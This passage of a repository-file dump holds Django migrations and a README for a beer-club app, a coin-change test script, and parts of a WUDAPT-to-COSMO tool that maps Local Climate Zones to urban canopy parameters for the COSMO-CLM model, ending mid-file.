"num_lines": 2,
"path": "/feer_club/feer_club/settings/__init__.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\r\nfrom .dev import * # or .dev if you want dev\r\n"
},
{
"alpha_fraction": 0.56379634141922,
"alphanum_fraction": 0.5839095115661621,
"avg_line_length": 35.15909194946289,
"blob_id": "7745eabb757d0c9d585b6d7dc07c5092c79ae8ef",
"content_id": "70ccaf69b4fb213c1da5afc3a5a335742bac942b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1591,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 44,
"path": "/feer_club/feer/migrations/0011_auto_20160206_1305.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 12:05\nfrom __future__ import unicode_literals\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('feer', '0010_auto_20160120_2232'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Profile',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ],\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('index', models.FloatField()),\n ('comment', models.TextField(default='')),\n ('beer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.Beer')),\n ('profile', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.Profile')),\n ],\n ),\n migrations.AddField(\n model_name='profile',\n name='reviews',\n field=models.ManyToManyField(through='feer.Rating', to='feer.Beer'),\n ),\n migrations.AddField(\n model_name='profile',\n name='user',\n field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5359342694282532,
"alphanum_fraction": 0.6078028678894043,
"avg_line_length": 23.350000381469727,
"blob_id": "00a7c74b9d885dca4dadd2f850b83c0cc649a3a6",
"content_id": "e0b7931be55fdaed5690939d36db1a9c9a528e1e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 487,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0019_order_remainding_balance.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-04-23 11:57\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0018_auto_20160402_1503'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='remainding_balance',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5541125535964966,
"alphanum_fraction": 0.5974025726318359,
"avg_line_length": 22.100000381469727,
"blob_id": "73de39468694a276cab73f9b7f04a80a6fbc88ba",
"content_id": "c334b0fb1b19259a58cdb2968767142e639abc99",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 462,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0003_auto_20160114_1836.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-14 17:36\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0002_orderlist_name'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='orderlist',\n name='order_date',\n field=models.DateField(verbose_name='order date'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5381882786750793,
"alphanum_fraction": 0.5537300109863281,
"avg_line_length": 39.21428680419922,
"blob_id": "8ab11158a25dacad67e83b0d3a34bb134d7ebbd0",
"content_id": "31c47e0396e53346966666540b490b9690a43bec",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2252,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 56,
"path": "/feer_club/feer/migrations/0001_initial.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-14 17:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Beer',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=512)),\n ('brewery', models.CharField(max_length=512)),\n ('country', models.CharField(max_length=512)),\n ('style', models.CharField(max_length=512)),\n ('abv', models.FloatField()),\n ('ibu', models.IntegerField()),\n ('volume', models.IntegerField()),\n ('purchase_url', models.URLField(max_length=512)),\n ('price', models.DecimalField(decimal_places=2, max_digits=6)),\n ],\n ),\n migrations.CreateModel(\n name='OrderItem',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('quantity', models.IntegerField()),\n ('participants', models.IntegerField()),\n ('volume_per_participant', models.FloatField()),\n ('beer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.Beer')),\n ],\n ),\n migrations.CreateModel(\n name='OrderList',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('order_date', models.DateTimeField(verbose_name='order date')),\n ('cost', models.DecimalField(decimal_places=2, max_digits=6)),\n ('beers', models.ManyToManyField(through='feer.OrderItem', to='feer.Beer')),\n ],\n ),\n migrations.AddField(\n model_name='orderitem',\n name='order_list',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='feer.OrderList'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.7024456262588501,
"alphanum_fraction": 0.73097825050354,
"avg_line_length": 34,
"blob_id": "62c87953f69bcf3c3c6db1c3bcad31ae0e9de7e7",
"content_id": "9c726fb369b13072ccea3d50da1755d3e8dc0602",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 736,
"license_type": "permissive",
"max_line_length": 211,
"num_lines": 21,
"path": "/README.md",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# Feer-Club\nManage Them Beers\n\n## Getting started\n\n- Install python3\n- `pip install -r requirements.txt`\n- `cd feer_club/`\n- `python manage.py runserver`\n- `python manage.py createsuperuser` to create a user\n- Go to `http://127.0.0.1:8000/admin` for admin page\n- Go to `http://127.0.0.1:8000/feer` for beers! Cheers!\n\n### Seeding the Database\nThe `feer` app has fixtures for a number of models in the `fixtures` directory in the `feer` app. Load these using\n\n `python manage.py loaddata <fixture>`\n \n## Contributing\n\nIf you find any bugs or have any suggestions, please submit an issue in the issue tracker and provide an appropriate tag. If you want the issue to be resolved within a reasonable time frame, make a pull request.\n\n"
},
{
"alpha_fraction": 0.5305164456367493,
"alphanum_fraction": 0.577464759349823,
"avg_line_length": 20.299999237060547,
"blob_id": "3534d8b4298dffbc9756522aa52f6e7d40bdf2fa",
"content_id": "a249b37a4a9eea74df171855f9d0f3c575b32ffd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 426,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0006_auto_20160116_2137.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-16 20:37\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0005_orderitem_cost'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='orderitem',\n old_name='order_list',\n new_name='order',\n ),\n ]\n"
},
{
"alpha_fraction": 0.7419354915618896,
"alphanum_fraction": 0.7419354915618896,
"avg_line_length": 16.714284896850586,
"blob_id": "93d59da39b206a9182c9fb78eeecd1676681a631",
"content_id": "6b19870f34a363bbbff40029135ea6669e63bcf3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 7,
"path": "/feer_club/feer/apps.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from __future__ import unicode_literals\n\nfrom django.apps import AppConfig\n\n\nclass FeerConfig(AppConfig):\n name = 'feer'\n"
},
{
"alpha_fraction": 0.5302144289016724,
"alphanum_fraction": 0.5984405279159546,
"avg_line_length": 23.428571701049805,
"blob_id": "95a8b42ce123a9455c123fa2ce1a8bdc0ab0239e",
"content_id": "b132d6ff05693bf15fc8bcc68a32a8b4ea7ca729",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 513,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 21,
"path": "/feer_club/feer/migrations/0005_orderitem_cost.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-16 12:44\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0004_auto_20160114_1844'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='orderitem',\n name='cost',\n field=models.DecimalField(decimal_places=2, default=0, max_digits=6),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.5158371329307556,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 21.100000381469727,
"blob_id": "5acff8561b3d5e9d4d9d9de19bc5ff78c5bb15da",
"content_id": "b227768b5bf244d44a9a590840b51490fa0914e5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 442,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 20,
"path": "/feer_club/feer/migrations/0009_auto_20160120_2229.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-20 21:29\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0008_auto_20160120_1326'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='beer',\n name='ibu',\n field=models.IntegerField(blank=True),\n ),\n ]\n"
},
{
"alpha_fraction": 0.513189435005188,
"alphanum_fraction": 0.5899280309677124,
"avg_line_length": 20.947368621826172,
"blob_id": "0580af0f34fdb54ae434822bd1f01a22feb70077",
"content_id": "42a78f625aa32df0eb39b8b8a069c2c22be12e1e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 417,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 19,
"path": "/feer_club/feer/migrations/0014_auto_20160206_2050.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-02-06 19:50\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0013_auto_20160206_1855'),\n ]\n\n operations = [\n migrations.AlterUniqueTogether(\n name='rating',\n unique_together=set([('beer', 'user')]),\n ),\n ]\n"
},
{
"alpha_fraction": 0.8121827244758606,
"alphanum_fraction": 0.8121827244758606,
"avg_line_length": 27.14285659790039,
"blob_id": "2a9d7cdd1745175c805f7cd56c77d15e92c9a870",
"content_id": "190bb4b0f5ca545e79e9944f2bf0410c4dd3ffeb",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 7,
"path": "/feer_club/feer/admin.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Beer, Order, OrderItem, Rating\n\nadmin.site.register(Beer)\nadmin.site.register(Order)\nadmin.site.register(OrderItem)\nadmin.site.register(Rating)\n"
},
{
"alpha_fraction": 0.5063613057136536,
"alphanum_fraction": 0.5877862572669983,
"avg_line_length": 19.6842098236084,
"blob_id": "c3726cd87b90b0a62d32a143908d19fd1104599b",
"content_id": "07f96207062c3837ea155cbf58ae07cce60c6b99",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 393,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 19,
"path": "/feer_club/feer/migrations/0004_auto_20160114_1844.py",
"repo_name": "amatt13/Feer-Club",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.1 on 2016-01-14 17:44\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('feer', '0003_auto_20160114_1836'),\n ]\n\n operations = [\n migrations.RenameModel(\n old_name='OrderList',\n new_name='Order',\n ),\n ]\n"
}
] | 25 |
francikjm/project2 | https://github.com/francikjm/project2 | 2250e28372c9146adfef5769c89bb17bc7cdf362 | e9b654b411b5e005bee19b3153bd50cc81e920ee | 93febd150e058d545884a09bd08121e786074558 | refs/heads/master | 2021-01-20T07:07:50.880496 | 2017-05-01T23:30:36 | 2017-05-01T23:30:36 | 89,964,500 | 0 | 0 | null | 2017-05-01T21:27:50 | 2017-04-27T15:53:41 | 2017-04-28T00:37:20 | null | [
{
"alpha_fraction": 0.49602648615837097,
"alphanum_fraction": 0.5456953644752502,
"avg_line_length": 29.200000762939453,
"blob_id": "4a366592e6efd20b0cf7cad34e3ba4d0eaeb3c20",
"content_id": "b812bf85f9ce2bae8450adc553af16871df322eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3026,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 100,
"path": "/testalgos.py",
"repo_name": "francikjm/project2",
"src_encoding": "UTF-8",
"text": "# This file will test all four functions using the same test cases\n\n#import 2nd algorithm\n\n#import 3rd algorithm\n\n# import Juans's 2nd algorithm\nfrom algo2 import changegreedy as getchange2\n\n\ndef main():\n\n #Test Cases\n testOne = [1,2,4,8]\n testTwo = [1,3,7,12]\n testThree = [1,3,7,12]\n\n\n #3. Suppose\n # V1 = [1, 2, 6, 12, 24, 48, 60],\n # V2 = [1, 5, 10, 25, 50] and\n # V3 = [1, 6, 13, 37, 150],\n # for each integer value of A in [1, 2, 3, …, 50]\n # determine the number of coins that changeslow.\n # changegreedy and changedp requires for each denomination set.\n V1 = [1, 2, 6, 12, 24, 48, 60]\n V2 = [1, 5, 10, 25, 50]\n V3 = [1, 6, 13, 37, 150]\n questhree_Testcase = []\n questhree_Testcase.append(V1)\n questhree_Testcase.append(V2)\n questhree_Testcase.append(V3)\n\n\n testCase = []\n testCase.append(testOne)\n testCase.append(testTwo)\n testCase.append(testThree)\n\n\n coinAmount = [15, 29, 31]\n\n\n for x in range(1, 2):\n algoID = x\n\n if (algoID == 1):\n getchange = getchange2\n\n elif (algoID == 2):\n print(\"algoID\",algoID)\n getchange = getchange2\n\n else:\n print(algoID)\n\n # Loop through test cases\n for testinput in range(0, len(testCase)):\n cArray, m = getchange(testCase[testinput], coinAmount[testinput])\n print(\"Array\", cArray)\n print(\"m\", m)\n\n\n # Loop for each integer value of A in [1, 2, 3, …, 50] in test cases V1, V2 and V3\n for amount in range(1, 51):\n #Values of V1\n cArray, m = getchange(questhree_Testcase[0], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V2\n cArray, m = getchange(questhree_Testcase[1], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V3\n cArray, m = getchange(questhree_Testcase[2], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n\n\n\n # For each integer value of A in [2000, 2001, 2002, …, 2200]\n # determine the number of coins that\n # changegreedy and changedp requires for each denomination set\n for amount in range(2000, 2200):\n #Values of V1\n cArray, m = getchange(questhree_Testcase[0], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V2\n cArray, m = getchange(questhree_Testcase[1], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n # Values of V3\n cArray, m = getchange(questhree_Testcase[2], amount)\n print(\"AMOUNT of \", amount, \"|\" \"ARRAY = \", cArray)\n print(\"Number of Coins = \", m)\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.7878788113594055,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 15.5,
"blob_id": "566789f6e0170b5ee474be3d99fb9617b9f48235",
"content_id": "447eb855789b681628d24ddd40991bc4ef79d1f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 2,
"path": "/README.md",
"repo_name": "francikjm/project2",
"src_encoding": "UTF-8",
"text": "# project2\ncoin change algorithm\n"
}
] | 2 |
shepherdmeng/WUDAPT-to-COSMO | https://github.com/shepherdmeng/WUDAPT-to-COSMO | 487b0f533df249bced14b0ade3feaf5283ca9930 | 9b01eb2ffa22febc6c50b8170b2984c63f971c3a | a1c0f20d73e30919318ea2e322ad0f714927df4e | refs/heads/master | 2023-04-12T05:00:22.446334 | 2021-05-10T10:11:21 | 2021-05-10T10:11:21 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6844903826713562,
"alphanum_fraction": 0.7550960183143616,
"avg_line_length": 68.06122589111328,
"blob_id": "c7d7a32ef68595213ad51b7bd11756e0335e5dbf",
"content_id": "bbcba646deb0cc97e73e907fbfd15ffd7b1b0374",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3387,
"license_type": "no_license",
"max_line_length": 769,
"num_lines": 49,
"path": "/README.md",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "# WUDAPT-to-COSMO\n\nSet of tools to use Local Climate Zone (LCZ)-based urban canopy parameters in DWD's COSMO-CLM NWP and regional climate model.\n\n## Citaton\nVarentsov, M., Samsonov, T., Demuzere, M., (2020). Impact of urban canopy parameters on a megacity’s modelled thermal environment. Atmosphere 11(12), 1349; [https://doi.org/10.3390/atmos11121349](https://www.mdpi.com/2073-4433/11/12/1349).\n\n## Context\nTERRA_URB is the urban canopy parameterization embedded in TERRA-ML, the land surface model in COSMO-CLM. By default it uses impervious surface area information from the [Copernicus Land Monitoring Service](https://land.copernicus.eu/pan-european/high-resolution-layers/imperviousness) (for Europe) / [National Geophysical Data Center](https://databasin.org/datasets/016d2235a5ed43ad83ceeed6c408d149) (global) and anthropogenic heat flux information from [Flanner et al. (2010)](https://agupubs.onlinelibrary.wiley.com/doi/full/10.1029/2008gl036465). All other geometrical, thermal and radiative urban canopy parameters are spatially invariant, and set to the bulk values provided in Table 1 of [Wouters et al., 2016](https://gmd.copernicus.org/articles/9/3027/2016/)).\n\nThe set of tools provided in this repo allow one to introduce LCZ-based urban canopy parameters, compiled from [Stewart and Oke (2012)](http://10.1175/BAMS-D-11-00019.1) and [Stewart et al. (2014)](http://10.1002/joc.3746).\n\nThis work is an outcome of AEVUS I and II, the COSMO Priority Tasks on \"Analysis and evaluation of the TERRA_URB scheme\". More info [here](http://www.cosmo-model.org/content/tasks/priorityTasks/default.htm) (project pages only accessible to COSMO members). Preliminary test results of LCZ parameters in COSMO-CLM are also described in Brousse et al. ([2019](https://doi.org/10.1016/j.uclim.2018.12.004), [2020](https://onlinelibrary.wiley.com/doi/abs/10.1002/joc.6477)) and Van de Walle et al. (20xx, under review). \n\n\n\n## Requirements\n* Be a member of the [COSMO-CLM community](https://wiki.coast.hzg.de/clmcom/), in order to be able to access [EXTPAR](https://wiki.coast.hzg.de/clmcom/external-data-98599196.html).\n* Have your domain file available from EXTPAR (netcdf file)\n* an LCZ map covering the same region of interest. Sources for existing LCZ maps:\n * Europe: [paper](https://journals.plos.org/plosone/article?id=10.1371/journal.pone.0214474) | [data](http://doi.org/10.6084/m9.figshare.13322450.v1)\n * Continental United States: [paper](https://doi.org/10.1038/s41597-020-00605-z) | [data](https://doi.org/10.6084/m9.figshare.11416950.v1) \n * An online LCZ Generator tool is currently under development; a beta version can be accessed [here](https://lcz-generator.geographie.rub.de/). Please contact Matthias.Demuzere @ rub.de for more information.\n \n\n\n## Instructions\n\nIt is advised to use a python virtual environment:\n1. Go into scriptdir: `cd /SCRIPT/DIR/`\n2. Create virtual environment: `python3 -m venv venv` or `virtualenv venv`\n3. Install module requirements: `venv/bin/pip install -r requirements.txt`\n4. Use `venv/bin/python` to run scripts.\n\nThe `requirements.txt` can be generated using `pipreqs`: \n```\ncd /SCRIPT/DIR/\npipreqs --ignore=terra/ .\n```\n\n\n### Execute\n\nThe run code is currently configured for the Moscow case, as developed in Varentsov et al.\nCLM and LCZ input data used in this study is provided under `data/`.\n\n```\nvenv/bin/pip/python run.py\n```\n\n"
},
{
"alpha_fraction": 0.7008830308914185,
"alphanum_fraction": 0.7130242586135864,
"avg_line_length": 24.19444465637207,
"blob_id": "779da69e17ac43937e9c0eb516a93bfd1e34b22d",
"content_id": "6a1bfc7715a32d4d35c6a37d28ef08c27b9bd3d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 906,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 36,
"path": "/run.py",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "import os\nabspath = os.path.abspath(__file__)\nWORKDIR = os.path.dirname(abspath)\nos.chdir(WORKDIR)\nfrom utils import lcz_to_cosmo, remove_double_counting\n\n## Adjust directory here\nCLMFILE = f\"{WORKDIR}/data/MSK_0.009bg3_Globcover.nc\"\nLCZFILE = f\"{WORKDIR}/data/LCZ_Russia_Moscow.tif\"\n\n# FILES\nUCPFILE = f\"{WORKDIR}/tables/LCZ_UCP_default.csv\"\nGCFILE = f\"{WORKDIR}/tables/globcover_lookup.csv\"\n\n\n# EXECUTE FUNCTIONS\n# 1. Assign UCP values to LCZ map and convert to COSMO Grid\nCLM_FILE_NEW = lcz_to_cosmo(\n ucpFile=UCPFILE,\n clmFile=CLMFILE,\n lczFile=LCZFILE,\n bandNr=3,\n ucpVersion='default',\n nrLcz=17,\n interpMethod='linear',\n aggregation=True,\n aggregationScale=2,\n isaWeight=True,\n saiWeight=False,\n fileNameExt='_Varentsov_etal_Atm')\n\n# 2. Address the double counting issue.\nremove_double_counting(\n clmFile=CLM_FILE_NEW,\n gcFile=GCFILE,\n removeUrban=True)"
},
{
"alpha_fraction": 0.5699892044067383,
"alphanum_fraction": 0.5874999761581421,
"avg_line_length": 44.490196228027344,
"blob_id": "176a1dd1651ed59ddb7fd426c59274a72449d890",
"content_id": "6e3f99baea13259d00888d71d567aa169c73032f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 18572,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 408,
"path": "/utils.py",
"repo_name": "shepherdmeng/WUDAPT-to-COSMO",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport xarray as xr\nfrom scipy.interpolate import RegularGridInterpolator\nimport scipy.ndimage\nimport rasterio\n\n## Helper function to prepare the urban canopy data.\ndef prepare_ucp_lookup(ucpFile, saiWeight=False, snow_f=0, alb_snow=0.70, emi_snow=0.997):\n\n \"\"\"\n\n AUTHOR: Matthias Demuzere (matthias.demuzere [@] rub.de)\n\n :param ucpFile : Absolute path to urban canopy parameter csv file.\n :param saiWeight: Weigh parameters according to Surface Area Index (Default = False)\n :param snow_f : snow fraction (default = 0)\n :param alb_snow : snow albedo (default = 0.7)\n :param emi_snow : emissivity albedo (default = 0.997)\n :return:\n\n :INFO:\n Code generally follows SURY: https://github.com/hendrikwout/sury/blob/master/sury.py\n\n * Wouters, H., Demuzere, M., Blahak, U., Fortuniak, K., Maiheu., B.,\n Camps, J., Tielemans, and N. P. M. van Lipzig, 2016. The efficient\n urban-canopy dependency parametrization SURY (v1.0) for atmospheric modelling:\n description and application with the COSMO-CLM model (v5.0_clm6) for a\n Belgian Summer, Geosci. Model Dev., 2016.\n\n Define the look-up table, based on the values of:\n * Stewart, I. D., & Oke, T. R. (2012). Local Climate Zones for Urban Temperature Studies.\n Bulletin of the American Meteorological Society, 93(12), 1879–1900.\n * Stewart, I. D., Oke, T. R., & Krayenhoff, E. S. (2014). Evaluation of the ‘local climate zone’\n scheme using temperature observations and model simulations. International Journal of Climatology,\n 34(4), 1062–1080. https://doi.org/10.1002/joc.3746\n\n The latter paper describes thermal admittance values of facets only. Heat conductivity and\n capacity values are obtained via Scott Krayenhoff (personal communication).\n\n \"\"\"\n\n ## Read look-up table\n ucp = pd.read_csv(ucpFile,sep=';',index_col=0).iloc[:17,:]\n\n ## Canyon albedo reduction factor, eq. 15\n psi_canyon = np.exp(-0.6 * ucp['URB_H2W'])\n psi_canyon[10:] = 0 # Set to zero for non-urban LCZs\n\n ## Total albedo reduction factor, eq. 14\n psi_bulk = psi_canyon * (1 - ucp['URB_BLDFR']) + ucp['URB_BLDFR']\n psi_bulk[10:] = 0 # Set to zero for non-urban LCZs\n\n ## Bulk shortwave albedo, using facet information. Eq 16\n alb_roof_snow = ucp['URB_RfALB'] * (1. - snow_f) + alb_snow * snow_f\n alb_road_snow = ucp['URB_RdALB'] * (1. - snow_f) + alb_snow * snow_f\n alb_wall_snow = ucp['URB_WaALB'] * (1. - snow_f) + alb_snow * snow_f\n ucp['URB_SALB_BK'] = (alb_road_snow + 2. * ucp['URB_H2W'] * alb_wall_snow) / \\\n (1. + 2. * ucp['URB_H2W']) * psi_canyon * (1. - ucp['URB_BLDFR']) \\\n + alb_roof_snow * ucp['URB_BLDFR']\n ucp.loc[11:, 'URB_SALB_BK'] = 0\n # ucp['URB_TALB'] = ucp['URB_SALB'].copy()\n\n ## Bulk emissivity, using facet information. Eq 16\n emi_roof_snow = (1. - ucp['URB_RfEMI']) * (1. - snow_f) + (1. - emi_snow) * snow_f\n emi_road_snow = (1. - ucp['URB_RdEMI']) * (1. - snow_f) + (1. - emi_snow) * snow_f\n emi_wall_snow = (1. - ucp['URB_WaEMI']) * (1. - snow_f) + (1. - emi_snow) * snow_f\n ucp['URB_EMIS_BK'] = 1. - ((emi_road_snow + 2. * ucp['URB_H2W'] * emi_wall_snow) \\\n / (1. + 2. * ucp['URB_H2W']) * psi_canyon * (1. - ucp['URB_BLDFR']) \\\n + emi_roof_snow * ucp['URB_BLDFR'])\n ucp.loc[11:, 'URB_EMIS_BK'] = 0\n\n ## Bulk thermal albedo\n ucp['URB_TALB_BK'] = 1 - ucp['URB_EMIS_BK']\n ucp.loc[11:, 'URB_TALB_BK'] = 0\n\n ## Calculate Surface Area Index from geometrical considerations (Eq. 3)\n SAI = (1. + 2. * ucp['URB_H2W']) * (1. 
- ucp['URB_BLDFR']) + ucp['URB_BLDFR']\n\n ## Get mean Heat capacity and conductivity, using eq. 10, 11 and 4.\n ucp['URB_HCON'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaHCON'] + ucp['URB_RdHCON']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfHCON'])\n ucp['URB_HCAP'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaHCAP'] + ucp['URB_RdHCAP']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfHCAP'])\n\n ## Mean facet-level albedo and emissivity based on eq. 10\n ## Only added for testing and potential comparison with other models\n ## These values are currently not used in TERRA_URB.\n ucp['URB_EMIS_FL'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaEMI'] + ucp['URB_RdEMI']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfEMI'])\n ucp['URB_SALB_FL'] = ((1 - ucp['URB_BLDFR']) / SAI) * \\\n (2 * ucp['URB_H2W'] * ucp['URB_WaALB'] + ucp['URB_RdALB']) + \\\n (ucp['URB_BLDFR'] / SAI * ucp['URB_RfALB'])\n ucp['URB_TALB_FL'] = 1 - ucp['URB_EMIS_FL']\n ucp.loc[11:, 'URB_SALB_FL'] = 0\n ucp.loc[11:, 'URB_TALB_FL'] = 0\n\n ## For now, TERRA-URB only reads in one average facet-level albedo.\n ## The bulk calculation from eqs. 13 is done within TERRA_URB\n ## Therefore, the bulk value needs to be reversed back to a mean\n ## facet value, so that eq. 13 is solved for alb = alb_bulk / psi_bulk\n ## The 